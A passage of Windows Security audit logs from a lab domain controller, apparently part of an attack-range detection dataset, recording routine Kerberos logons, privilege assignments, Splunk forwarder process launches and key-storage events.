- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:32:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264738
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x85DEA1
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:33:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264741
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1290
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:33:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264743
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x13b8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:33:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264742
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x13f0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:33:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264744
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1258
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:33:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264746
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x115c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:33:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264745
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b24
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:33:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264747
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1574
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:33:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5059
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Other System Events
OpCode=Info
RecordNumber=264750
Keywords=Audit Success
Message=Key migration operation.
Subject:
Security ID: NT AUTHORITY\LOCAL SERVICE
Account Name: LOCAL SERVICE
Account Domain: NT AUTHORITY
Logon ID: 0x3E5
Cryptographic Parameters:
Provider Name: Microsoft Software Key Storage Provider
Algorithm Name: ECDSA_P256
Key Name: Administrator@attackrange.local
Key Type: User key.
Additional Information:
Operation: Export of persistent cryptographic key.
Return Code: 0x0
04/19/2021 03:33:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5061
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=System Integrity
OpCode=Info
RecordNumber=264749
Keywords=Audit Success
Message=Cryptographic operation.
Subject:
Security ID: NT AUTHORITY\LOCAL SERVICE
Account Name: LOCAL SERVICE
Account Domain: NT AUTHORITY
Logon ID: 0x3E5
Cryptographic Parameters:
Provider Name: Microsoft Software Key Storage Provider
Algorithm Name: ECDSA_P256
Key Name: Administrator@attackrange.local
Key Type: User key.
Cryptographic Operation:
Operation: Open Key.
Return Code: 0x0
04/19/2021 03:33:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5058
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Other System Events
OpCode=Info
RecordNumber=264748
Keywords=Audit Success
Message=Key file operation.
Subject:
Security ID: NT AUTHORITY\LOCAL SERVICE
Account Name: LOCAL SERVICE
Account Domain: NT AUTHORITY
Logon ID: 0x3E5
Cryptographic Parameters:
Provider Name: Microsoft Software Key Storage Provider
Algorithm Name: UNKNOWN
Key Name: Administrator@attackrange.local
Key Type: User key.
Key File Operation Information:
File Path: C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\Crypto\Keys\d4ca5289cf34fcb2bfb55faebd03c63e_a9c24923-99b2-4e93-832a-9a25a9ee4602
Operation: Read persisted key from file.
Return Code: 0x0
04/19/2021 03:33:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264753
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x861B9C
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:33:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264752
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x861B9C
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53653
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:33:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264751
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x861B9C
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:34:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264765
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x862586
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:34:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264764
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x862674
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:34:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264763
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8626BC
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:34:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264762
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x862754
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {271648EC-6A60-17D5-CF0E-2D75C946746E}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53658
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:34:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264761
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x862754
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:34:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264760
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8626BC
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.14
Source Port: 53657
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:34:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264759
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8626BC
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:34:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264758
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x862674
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 0
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:34:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264757
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x862674
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:34:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264756
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x862586
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53656
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:34:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264755
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x862586
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:34:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264754
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x89c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:34:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264767
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x720
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
